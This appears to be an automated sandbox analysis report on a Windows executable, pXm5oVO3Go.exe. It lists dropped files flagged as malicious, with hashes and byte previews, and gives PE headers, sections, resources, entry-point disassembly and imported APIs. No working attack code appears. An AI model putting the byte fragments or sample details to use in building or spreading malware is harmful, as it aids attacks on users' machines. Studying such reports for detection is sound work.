                                Size (bytes):6443425
                                Entropy (8bit):7.999970882342927
                                Encrypted:true
                                SSDEEP:98304:7c5bWQVHWXS1k+CxcfLg3LFvsI0i/2tEn+ynekhscRZ+Q3FqFoJSnerSgkogC6qz:7c5FNB7WRjsUZn5h/+e7Vkokqg8iEHCu
                                MD5:FB936CD4F33E5AE9AB88D7AE21B8D654
                                SHA1:157DF7F219BB272F2DC56B3AA0BD5CE70E4902DA
                                SHA-256:3C55279D70BBAAA18DCA653DD5922BEAE2F720B8285D6A195A21961DE005BCF2
                                SHA-512:F72254B4CE87CAAFA12DD2DDEEC7B77DABEE2FC052E3CA102E55C5ABCC7F99FD4EE6A8544F5942D2A75EDF66C406CB20A0978E9E378055B79EFFB820094AADC1
                                Malicious:false
                                Preview:PK........R..Y................text/UT....1.f.1.f.1.fPK..........7X........x.......text/MSVCP140.dllUT.....ej..f2M.f.z.0I\pq...7....N...y..A....L.:.v.FF.e}.F."..._.....hI.g....M_.....]..x..h.\....xh...=X....R. .....W2O#-.u..-sZ.%.ST..=.{...3W>...h./.(...nL..&.+~.^BY..<..:.T..k......jq.[...n.T..{h....../c..iAj..+..|..|.x\.:L.S...C.@r..M.u....`%..fJK].^.;$)...(.H.$...W1;c..9;fLF.....h..!=|.z..<.2..A ..<.=T.(.t-....j.K<.z>.Uu.....>a..".-,7.*\.Q.k...'#.....P....G.[H;*...}.h........}.i..x...!sVN.8....G.&_#...]J...._g]..G....,f.RJ...U/...w.d.........v.-........!.A=\\Un.....f....5c`7.[..t.:..J1.../HV.%..6I....I....B.e.j.".....>...($....|:.Wb..wAx.*......B.MX}b.p..k.05.5^%.w.C.... ua}.......*:..?u...!j[..0;!...Bi..d..i.F.2T..2.....m..gC.}.R....2.J...7.J$u)...#oo.DD...$..P.OTzy.D.F..S5.)i.*.*.....A\....]..t...P4..R..;O..._k.F..@..1......j.a.."..<...V.m....je...I*....lO.........|sl.".J..X..l8C..xqR."e.yt`.6.o8!.E...#.uA.S../..Vh...q...Q....*.4JN^...;Q..v
                                Process:C:\Users\user\Desktop\pXm5oVO3Go.exe
                                File Type:PC bitmap, Windows 3.x format, 556 x 556 x 32, image size 1236544, cbSize 1236598, bits offset 54
                                Category:dropped
                                Size (bytes):1236598
                                Entropy (8bit):7.382377228331485
                                Encrypted:false
                                SSDEEP:24576:hXptT9TEpaNPwRTOMcEBe0rOZsdEjQGUeK+GKe66/uV:hZXFNoRk10aZsWjQeBGT
                                MD5:137CAFC945CE96E386ECBFBD8C915D46
                                SHA1:815BD011538F45CFA469C76861EBD5F7CC24AA79
                                SHA-256:12F9EDFB042B9D83AF6FA44F3DEE7A320A8D17F5951996B56563ABF3E527470B
                                SHA-512:5C377130ED4A2CA7FD8A1DCE5001D492E46D1947B6101658CC517366FDE75B0E8AA02168BA258BC35640AE0BB6915916854EC5DA1B4D58137B552C9BFFBB5027
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                Preview:BMv.......6...(...,...,..... .....@...................*R..d...c...........g...'...g...g...g...g...g...g...g...g.......i...g...F..L.)Th.{ p.ggr.e c.fno.(beGzunGan #GS .gdeI...C...g......A...........4........F..........).....9...................1......0......7....5ach...g...g...7M..+...R..fg...g......!l...g...g8..g...CU..g...g...g...g...g...b...g...b...g...g8..g...g...e.@.g...g...g...g...g...w....A.......>......g8..?...g...g...g...g...gH......g...g...g...g...g...g...g...g...? ..'...g...g...g.......g...g...g...g...g...g...I|ex....F...g...g...g...g...g...g...G..`Izda.i..=...g...g...g...g...g...g...'..@Ilat........gx..g...g\..g...g...g...'...Izsr....?...g8..g...g...g...g...g...'..@Izel.k..1...gH..g...g...g...g...g...'..Bg...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g.
                                Process:C:\Users\user\Desktop\pXm5oVO3Go.exe
                                File Type:PC bitmap, Windows 3.x format, 378 x 377 x 32, image size 570024, cbSize 570078, bits offset 54
                                Category:dropped
                                Size (bytes):569918
                                Entropy (8bit):7.22606385832403
                                Encrypted:false
                                SSDEEP:12288:Msj4UEF0Jo9ihYDdKa+yKGBaCMLT2ftNQ:L8Eo9dhKwnBfMLTqNQ
                                MD5:F2FA7879FAA4B732675FF265D3DA6FC0
                                SHA1:B9A5074F0D86EFA0CDACB4214C1FE66A41B8525E
                                SHA-256:8C7506B772BBFD534F20280AF36564FB4AE95C8708A2F95D471ED607CCF65272
                                SHA-512:5020D0403FE3D30570843CC8B08B76E7B3FBAA3A706293125DFDC6C60EE42536F90B753F2536068C87F850D96B14A9030392144B0561966B7A223055D38908C1
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                Preview:BM.......6...(...z...y..... .............................gPU.............o.h.g..hc...5`.t.QP.b..........f..S2^Wj.Pje...$....T.Xj.Qjn<blZ.;f..,..g.f..,..g.XjUn..C...gPj....$....?bdf.$.g..X.$.g....,4..,..g...C...g..$.....$.g....,..g.f..,..g.f..,..g.f..,..g.f..,..g.f..,..g.f..,..g..DC4S.3,=f.L$>.m.DCHpf.L$P+g.DCZa.#,Sf.L$T+a.DC^b.+,W.#,Xa.D$Y..D$=qAf.L$D1a.LCNf.#,Gt..D$.i.TCB.DCCA.3,L.3,Mf.L$N.kf.#,\V..L$9n.DCWtu.L$a..T$..D$.X.LCl.DCmot.k.DCat..,..g.F..,..g..C...g}sh...$......$.....|..C...g.$.....kti..$.g..o.mY..,..g..LCe.LC|.LCq..C...g......C...g.$....$ich.L$l .D$.|Na.n.DCziv.L$u4qst..D$.eI.;,|f.L$}.gf..,..g.Rt.$.g....,..g.A..,..g...C...gn.C...gNu..,..g..C...gkti...$......$....3i.C...gj..C...g.w.g...&.^...k.g....$.g..j...$....?n..C...gn..C...g.D${X..C...g.\$SXUU..j.8.D$#n.|C..DC..DC<PU.L$...|$yX.tC ....Xf.L$...D$q.D$;.D$...$....7].DC.P..,(..b.X..D$sn.DC...C...g.D$...$....7].DC.P..,(..b.^.L$l..t$s.D$...$....7].DC.f..,.P.|$(..j.?n.DC.f.#,..#,<.#,...,..g.PU.L$.7.t$O...,..g.
                                Process:C:\Users\user\Desktop\pXm5oVO3Go.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):139784
                                Entropy (8bit):6.883954420272221
                                Encrypted:false
                                SSDEEP:1536:lqOmEtRGptJAq+NKUmALI1C381ngfvMfqaJYn2KCkH0g9bbQWplEjyHWpdyxk9nG:lIhI+xr1ngfv4KVUeQWlfHWpoy80lKX
                                MD5:98C50817D295EEAC3C2968A656B79ADD
                                SHA1:0401B3CC5586255FFDD849B5C6E1A5124C7090E0
                                SHA-256:A8731026677A88F696A64FDC113BB33C5B94B059313A447F95A4459E281ED53B
                                SHA-512:354DBB5E89D1C18CBDD3C4D81FAB733B4B3259A12DA5BDD929E46B1ADD2954B8C9DEA832075E7C8D879641B1895BC597D27634B4E0DE937808CD32ECC624239E
                                Malicious:false
                                Preview:.l..l4U......g....!nlh.ll.hhl..>....P.il........ml.S9:Wj.4je..$.l.._.Xj.5jn7.lZ._f..H..llf..H..llXj^...H...l4j...$.l..4.df..$.ll.X..$.ll...H4..H..ll..H...l.$.l....$.ll...H..llf..H..llf..H..llf..H..llf..H..llf..H..llf..H..ll.DHPS.8H=f.($>...DH,pf.($P ..DH>a.(HSf.($T ..DH:b. HW.(HXa. $Y..D$6.Af.($D:..LH*f.(HGt..D$%..TH&.DH'A.8HL.8HMf.($N..f.(H\V..L$2..DH3tu.($a..T$..D$.<.LH..DH.ot...DH.t..H..llF..H..ll.H...l.sh%.$.l.....$.l......H...l..$.l....ti..$.ll.o..Y..H..ll.LH..LH..LH...H...l......H...l..$.l../.ch.($l+.D$..Na...DH.iv.($u?.st..D$..I.0H|f.($}..f..H..llRt..$.ll...H..llA..H..ll..H...l..H...l*u..H..ll.H...l.ti..$.l.....$.l..8..H...l...H...l.w.ll..-.^...k.ll....$.ll.jt.$.l..4...H...l...H...l.D$p<..H...l.\$X<UU..j.3.D$(..|Hx.DHt.DHXPU.($...|$r<.tHD...bXf.($...D$z.D$0.D$t.$.l..<9.DHpP..H(....X..D$x..DHz..H...l.D$t.$.l..<9.DHpP..H(....^.($l..t$x.D$t.$.l..<9.DHpf..H.P..$(..j.4..DHxf.(H..(H<.(H...H..llPU.($.<.t$D...H..llf..H..(H...H..llPU.($...t$r<.tHD...($P..|$x.D$t.$.l..
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):6.622548477017203
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 98.39%
                                • Windows ActiveX control (116523/4) 1.15%
                                • InstallShield setup (43055/19) 0.42%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                File name:pXm5oVO3Go.exe
                                File size:3'656'704 bytes
                                MD5:64a2f030c7c91762485ee16bc8a12e4f
                                SHA1:6193a1b655e641719f0b54edcdfce8fa326dc934
                                SHA256:d863d9572524236e97528275899b73ffe7f182b4824bd7efc12a2e8ae3e8955e
                                SHA512:733aa188bfa26cf83f5937e8e96ffbce40067861c0167d268a7698fb18e6a7ace96ac595090bcd81e5612306200ce26cdfeffc708dba0433b4498e26e6361eb7
                                SSDEEP:98304:o/QjJmzcVnj6Ov4xDSLrMcXCKKoRpv06CECrq4zFe2uiBzx:oQxvpXgIIECrq4z7zx
                                TLSH:F906B012BBC1C076E5533631916BA37E967DD6330B3592C396A42E395E301D2AA3D38F
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&/RCbN<.bN<.bN<.k6..cN<.k6..qN<.....eN<.y...SN<.y....O<.bN=..M<.k6..IN<.y....M<.y...wN<.E...cN<.y...cN<.RichbN<................
                                Icon Hash:f2d3d1d3b3f3d305
                                Entrypoint:0x6388e6
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:
                                Time Stamp:0x618BA2AE [Wed Nov 10 10:45:02 2021 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:974b68147a5b729a587369f0f61bfd7a
                                Instruction
                                call 00007F3EF8B207A2h
                                jmp 00007F3EF8B12F1Eh
                                cmp ecx, dword ptr [007330B0h]
                                jne 00007F3EF8B13094h
                                rep ret
                                jmp 00007F3EF8B20829h
                                mov edi, edi
                                push ebp
                                mov ebp, esp
                                mov eax, ecx
                                mov ecx, dword ptr [ebp+08h]
                                mov dword ptr [eax], 006F7058h
                                mov ecx, dword ptr [ecx]
                                mov dword ptr [eax+04h], ecx
                                mov byte ptr [eax+08h], 00000000h
                                pop ebp
                                retn 0008h
                                mov eax, dword ptr [ecx+04h]
                                test eax, eax
                                jne 00007F3EF8B13097h
                                mov eax, 006F7060h
                                ret
                                mov edi, edi
                                push ebp
                                mov ebp, esp
                                cmp dword ptr [ebp+08h], 00000000h
                                push edi
                                mov edi, ecx
                                je 00007F3EF8B130BFh
                                push esi
                                push dword ptr [ebp+08h]
                                call 00007F3EF8B1BD35h
                                lea esi, dword ptr [eax+01h]
                                push esi
                                call 00007F3EF8B14A23h
                                pop ecx
                                pop ecx
                                mov dword ptr [edi+04h], eax
                                test eax, eax
                                je 00007F3EF8B130A3h
                                push dword ptr [ebp+08h]
                                push esi
                                push eax
                                call 00007F3EF8B208D2h
                                add esp, 0Ch
                                mov byte ptr [edi+08h], 00000001h
                                pop esi
                                pop edi
                                pop ebp
                                retn 0004h
                                mov edi, edi
                                push esi
                                mov esi, ecx
                                cmp byte ptr [esi+08h], 00000000h
                                je 00007F3EF8B1309Bh
                                push dword ptr [esi+04h]
                                call 00007F3EF8B1354Ah
                                pop ecx
                                and dword ptr [esi+04h], 00000000h
                                mov byte ptr [esi+08h], 00000000h
                                pop esi
                                ret
                                mov edi, edi
                                push ebp
                                mov ebp, esp
                                mov eax, dword ptr [ebp+08h]
                                push esi
                                mov esi, ecx
                                and dword ptr [esi+04h], 00000000h
                                mov dword ptr [esi], 006F7058h
                                mov byte ptr [esi+08h], 00000000h
                                push dword ptr [eax]
                                call 00007F3EF8B13017h
                                mov eax, esi
                                pop esi
                                pop ebp
                                retn 0004h
                                Programming Language:
                                • [C++] VS2008 SP1 build 30729
                                • [ C ] VS2008 SP1 build 30729
                                • [ASM] VS2010 SP1 build 40219
                                • [C++] VS2010 SP1 build 40219
                                • [IMP] VS2008 SP1 build 30729
                                • [ C ] VS2010 SP1 build 40219
                                • [LNK] VS2010 SP1 build 40219
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x31fb9c0x1b8.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x3410000xaa44.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x34c0000x2c8d4.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x284fe00x1c.rdata
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3015280x40.rdata
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x2840000xbdc.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x2820a20x28220016656008fa9113fe9a8690fd52ad0edfunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0x2840000x9fa020x9fc00442a0c929db0624d257be64f33b72a07False0.36007036140453835data5.64738857990474IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0x3240000x1c24c0x11a00d35d40b93758c0e3b2e6b3ac2f5f260aFalse0.390874335106383data5.348760131046066IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x3410000xb0000xac002dc3de242e4b5797c6a1bd0bd0dc65b4False0.30193949854651164data4.641268087531589IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x34c0000x3e20a0x3e40081ed51bb4e26407ded2394fc2f1c2016False0.34334211847389556data5.439303048507579IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_CURSOR0x341e500x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"ChineseChina0.4805194805194805
                                RT_CURSOR0x341f840xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"ChineseChina0.7
                                RT_CURSOR0x3420380x134AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdChineseChina0.36363636363636365
                                RT_CURSOR0x34216c0x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"ChineseChina0.35714285714285715
                                RT_CURSOR0x3422a00x134dataChineseChina0.37337662337662336
                                RT_CURSOR0x3423d40x134dataChineseChina0.37662337662337664
                                RT_CURSOR0x3425080x134Targa image data 64 x 65536 x 1 +32 "\001"ChineseChina0.36688311688311687
                                RT_CURSOR0x34263c0x134Targa image data 64 x 65536 x 1 +32 "\001"ChineseChina0.37662337662337664
                                RT_CURSOR0x3427700x134Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"ChineseChina0.36688311688311687
                                RT_CURSOR0x3428a40x134Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"ChineseChina0.38636363636363635
                                RT_CURSOR0x3429d80x134dataChineseChina0.44155844155844154
                                RT_CURSOR0x342b0c0x134dataChineseChina0.4155844155844156
                                RT_CURSOR0x342c400x134AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdChineseChina0.5422077922077922
                                RT_CURSOR0x342d740x134dataChineseChina0.2662337662337662
                                RT_CURSOR0x342ea80x134dataChineseChina0.2824675324675325
                                RT_CURSOR0x342fdc0x134dataChineseChina0.3246753246753247
                                RT_BITMAP0x3431100xb8Device independent bitmap graphic, 12 x 10 x 4, image size 80ChineseChina0.44565217391304346
                                RT_BITMAP0x3431c80x144Device independent bitmap graphic, 33 x 11 x 4, image size 220ChineseChina0.37962962962962965
                                RT_ICON0x34330c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192ChineseChina0.4222972972972973
                                RT_ICON0x3434340x568Device independent bitmap graphic, 16 x 32 x 8, image size 320ChineseChina0.45303468208092484
                                RT_ICON0x34399c0x368Device independent bitmap graphic, 16 x 32 x 24, image size 832ChineseChina0.6444954128440367
                                RT_ICON0x343d040x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640ChineseChina0.2110215053763441
                                RT_ICON0x343fec0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152ChineseChina0.5505415162454874
                                RT_ICON0x3448940xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688ChineseChina0.4450959488272921
                                RT_ICON0x34573c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088ChineseChina0.5691489361702128
                                RT_ICON0x345ba40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224ChineseChina0.3428705440900563
                                RT_ICON0x346c4c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600ChineseChina0.24626556016597512
                                RT_DIALOG0x3491f40x124dataChineseChina0.6883561643835616
                                RT_DIALOG0x3493180x44dataChineseChina0.9558823529411765
                                RT_DIALOG0x34935c0x110dataChineseChina0.45588235294117646
                                RT_DIALOG0x34946c0x8cdataChineseChina0.7
                                RT_DIALOG0x3494f80x44dataChineseChina0.7941176470588235
                                RT_DIALOG0x34953c0x94dataChineseChina0.7432432432432432
                                RT_DIALOG0x3495d00x44dataChineseChina0.8676470588235294
                                RT_DIALOG0x3496140x44dataChineseChina0.8529411764705882
                                RT_DIALOG0x3496580x11adataChineseChina0.6985815602836879
                                RT_DIALOG0x3497740xe8dataChineseChina0.6336206896551724
                                RT_DIALOG0x34985c0x34dataChineseChina0.9038461538461539
                                RT_STRING0x3498900x46dataChineseChina0.7
                                RT_STRING0x3498d80x82StarOffice Gallery theme p, 536899072 objects, 1st nChineseChina0.7153846153846154
                                RT_STRING0x34995c0x2adataChineseChina0.5476190476190477
                                RT_STRING0x3499880x184dataChineseChina0.48711340206185566
                                RT_STRING0x349b0c0x4e6dataChineseChina0.37719298245614036
                                RT_STRING0x349ff40x264dataChineseChina0.3333333333333333
                                RT_STRING0x34a2580x2dadataChineseChina0.3698630136986301
                                RT_STRING0x34a5340x8adataChineseChina0.6594202898550725
                                RT_STRING0x34a5c00xacdataChineseChina0.45348837209302323
                                RT_STRING0x34a66c0xdedataChineseChina0.536036036036036
                                RT_STRING0x34a74c0x4a8dataChineseChina0.3221476510067114
                                RT_STRING0x34abf40x228dataChineseChina0.4003623188405797
                                RT_STRING0x34ae1c0x2cdataChineseChina0.5227272727272727
                                RT_STRING0x34ae480x53cdataChineseChina0.2947761194029851
                                RT_GROUP_CURSOR0x34b3840x22Lotus unknown worksheet or configuration, revision 0x2ChineseChina1.0294117647058822
                                RT_GROUP_CURSOR0x34b3a80x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                RT_GROUP_CURSOR0x34b3bc0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                RT_GROUP_CURSOR0x34b3d00x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                RT_GROUP_CURSOR0x34b3e40x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                RT_GROUP_CURSOR0x34b3f80x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                RT_GROUP_CURSOR0x34b40c0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                RT_GROUP_CURSOR0x34b4200x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                RT_GROUP_CURSOR0x34b4340x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                RT_GROUP_CURSOR0x34b4480x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                RT_GROUP_CURSOR0x34b45c0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                RT_GROUP_CURSOR0x34b4700x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                RT_GROUP_CURSOR0x34b4840x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                RT_GROUP_CURSOR0x34b4980x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                RT_GROUP_CURSOR0x34b4ac0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                RT_GROUP_ICON0x34b4c00x84dataChineseChina0.6439393939393939
                                RT_VERSION0x34b5440x2a4dataChineseChina0.5281065088757396
                                RT_HTML0x34b7e80xfHTML document, ASCII text, with no line terminatorsChineseChina1.5333333333333334
                                RT_MANIFEST0x34b7f80x249XML 1.0 document, ASCII textEnglishUnited States0.576068376068376
                                DLLImport
                                WS2_32.dllfreeaddrinfo, htons, inet_addr, socket, bind, WSAGetLastError, WSAAsyncSelect, listen, accept, inet_ntoa, recv, send, WSACleanup, closesocket, WSASetLastError, __WSAFDIsSet, select, WSAIoctl, setsockopt, getsockname, ntohs, getsockopt, getpeername, connect, WSAStartup, getaddrinfo, sendto, recvfrom, ioctlsocket, gethostname, shutdown, htonl, getservbyname, gethostbyname
                                WLDAP32.dll
                                CRYPT32.dllCertCloseStore, CertEnumCertificatesInStore, CertFindCertificateInStore, CertOpenStore, CertGetCertificateContextProperty, CertFreeCertificateContext, CertDuplicateCertificateContext
                                KERNEL32.dllGetTempFileNameW, GetTempPathW, GetWindowsDirectoryW, GetNumberFormatW, GetFileAttributesW, GetProfileIntW, SearchPathW, SetErrorMode, GetFileAttributesExW, SetEndOfFile, FileTimeToLocalFileTime, GetFileSizeEx, GetFileTime, VirtualProtect, GetUserDefaultLCID, FindResourceExW, HeapSetInformation, GetStartupInfoW, HeapFree, GetCPInfo, CreateDirectoryW, EncodePointer, DecodePointer, GetSystemTimeAsFileTime, HeapAlloc, HeapReAlloc, ExitThread, CreateThread, ExitProcess, VirtualAlloc, GetSystemInfo, VirtualQuery, GetDriveTypeA, FindFirstFileExA, GetFileInformationByHandle, GetFileAttributesA, CreateFileA, SetConsoleCtrlHandler, ReadConsoleInputA, SetConsoleMode, GetConsoleMode, RtlUnwind, HeapQueryInformation, HeapSize, SetStdHandle, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, HeapCreate, TerminateProcess, UnhandledExceptionFilter, IsDebuggerPresent, IsProcessorFeaturePresent, LCMapStringW, GetStringTypeW, GetTimeZoneInformation, GetConsoleCP, GetOEMCP, IsValidCodePage, GetFullPathNameA, GetProcessHeap, WriteConsoleW, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, GetDriveTypeW, SetEnvironmentVariableA, UnlockFile, LockFile, SetFilePointer, lstrcmpiW, DeleteFileW, GetCurrentDirectoryW, GlobalFlags, GetSystemDirectoryW, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, GlobalHandle, GlobalReAlloc, TlsGetValue, LocalAlloc, InterlockedIncrement, FileTimeToSystemTime, GetThreadLocale, GlobalGetAtomNameW, RaiseException, WritePrivateProfileStringW, GetFullPathNameW, ResumeThread, SetThreadPriority, InterlockedDecrement, ReleaseActCtx, CreateActCtxW, lstrcmpA, GetUserDefaultUILanguage, ConvertDefaultLocale, GetSystemDefaultUILanguage, GetLocaleInfoW, LoadLibraryExW, GlobalAddAtomW, GlobalFindAtomW, GlobalDeleteAtom, GetVersionExW, GetModuleHandleW, CompareStringW, InitializeCriticalSectionAndSpinCount, lstrcmpW, ActivateActCtx, DeactivateActCtx, CopyFileW, GlobalSize, FormatMessageW, LocalFree, MulDiv, GetSystemTime, SystemTimeToFileTime, GlobalMemoryStatus, FindClose, GetVersion, FlushConsoleInputBuffer, FormatMessageA, SetLastError, GetStdHandle, GetFileType, WaitForMultipleObjects, PeekNamedPipe, ReadFile, ExpandEnvironmentStringsA, QueryPerformanceCounter, GetTickCount, SleepEx, QueryPerformanceFrequency, GetModuleHandleA, LoadLibraryA, GetSystemDirectoryA, VerSetConditionMask, VerifyVersionInfoA, OpenProcess, Process32NextW, Process32FirstW, CreateToolhelp32Snapshot, OutputDebugStringA, OutputDebugStringW, GetFileSize, FlushFileBuffers, FreeResource, GlobalFree, InterlockedExchange, GlobalUnlock, GlobalLock, GlobalAlloc, lstrlenA, WriteFile, GetCurrentThread, GetCurrentProcessId, CreateFileW, GetCurrentProcess, lstrcpyW, GetExitCodeProcess, WaitForSingleObject, CreateProcessW, GetModuleFileNameW, WideCharToMultiByte, lstrlenW, FreeLibrary, GetProcAddress, LoadLibraryW, GetCommandLineW, Sleep, CloseHandle, GetLastError, SetUnhandledExceptionFilter, MultiByteToWideChar, GetACP, GetPrivateProfileStringW, FindResourceW, LoadResource, LockResource, SizeofResource, GetCurrentThreadId, InitializeCriticalSection, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, GetVolumeInformationW, FindFirstFileW, GetPrivateProfileIntW, DuplicateHandle, InterlockedCompareExchange, GetTimeFormatA, GetDateFormatA
                                USER32.dllReuseDDElParam, UnpackDDElParam, CopyIcon, CharUpperBuffW, PostThreadMessageW, DefFrameProcW, DefMDIChildProcW, DrawMenuBar, TranslateMDISysAccel, CreateMenu, IsClipboardFormatAvailable, GetUpdateRect, GetDoubleClickTime, IsCharLowerW, GetKeyNameTextW, MapVirtualKeyExW, SubtractRect, DestroyCursor, GetWindowRgn, InsertMenuItemW, TranslateAcceleratorW, FrameRect, RegisterClipboardFormatW, EmptyClipboard, CloseClipboard, SetClipboardData, OpenClipboard, LoadImageW, GetIconInfo, HideCaret, InvertRect, LockWindowUpdate, BringWindowToTop, SetCursorPos, CreateAcceleratorTableW, LoadAcceleratorsW, GetKeyboardState, GetKeyboardLayout, MapVirtualKeyW, ToUnicodeEx, DrawFocusRect, DrawFrameControl, DrawEdge, DrawIconEx, SetClassLongW, DestroyAcceleratorTable, SetParent, DestroyIcon, GetNextDlgGroupItem, InvalidateRgn, SetRect, CopyAcceleratorTableW, CharNextW, UnregisterClassW, WaitMessage, CopyImage, GetMenuDefaultItem, SetMenuDefaultItem, IsMenu, MonitorFromPoint, UpdateLayeredWindow, EnableScrollBar, UnionRect, IsRectEmpty, CharUpperW, IsZoomed, GetAsyncKeyState, NotifyWinEvent, MessageBeep, ReleaseCapture, SetCapture, KillTimer, SetTimer, SetWindowRgn, LoadMenuW, DeleteMenu, OffsetRect, IntersectRect, RealChildWindowFromPoint, SetLayeredWindowAttributes, EnumDisplayMonitors, SetRectEmpty, LoadCursorW, GetSysColorBrush, WindowFromPoint, DestroyMenu, GetMenuItemInfoW, InflateRect, ShowOwnedPopups, SetCursor, GetMessageW, TranslateMessage, SetWindowContextHelpId, MapDialogRect, PostQuitMessage, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, ModifyMenuW, EnableMenuItem, CheckMenuItem, SendDlgItemMessageA, WinHelpW, IsChild, GetCapture, GetClassLongW, SetPropW, GetPropW, RemovePropW, GetForegroundWindow, DispatchMessageW, BeginDeferWindowPos, EndDeferWindowPos, GetTopWindow, GetMessageTime, GetMessagePos, PeekMessageW, MonitorFromWindow, GetMonitorInfoW, MapWindowPoints, ScrollWindow, TrackPopupMenu, GetKeyState, SetMenu, SetScrollRange, GetScrollRange, SetScrollPos, GetScrollPos, ShowScrollBar, RedrawWindow, IsWindowVisible, ValidateRect, CreateWindowExW, GetClassInfoExW, RegisterClassW, AdjustWindowRectEx, EqualRect, DeferWindowPos, GetScrollInfo, SetScrollInfo, SetWindowPlacement, GetWindowPlacement, DefWindowProcW, GetMenu, CopyRect, GetWindowTextLengthW, GetWindowTextW, SetFocus, MoveWindow, GetDlgCtrlID, SetWindowTextW, IsDialogMessageW, SetDlgItemTextW, SendDlgItemMessageW, CheckDlgButton, GetWindow, SetWindowsHookExW, UnhookWindowsHookEx, CallNextHookEx, GetFocus, GetSysColor, EndPaint, BeginPaint, GetWindowDC, ClientToScreen, ScreenToClient, GrayStringW, DrawTextExW, DrawTextW, TabbedTextOutW, GetWindowThreadProcessId, GetLastActivePopup, MessageBoxW, GetDesktopWindow, GetActiveWindow, CreateDialogIndirectParamW, DestroyWindow, IsWindow, GetDlgItem, 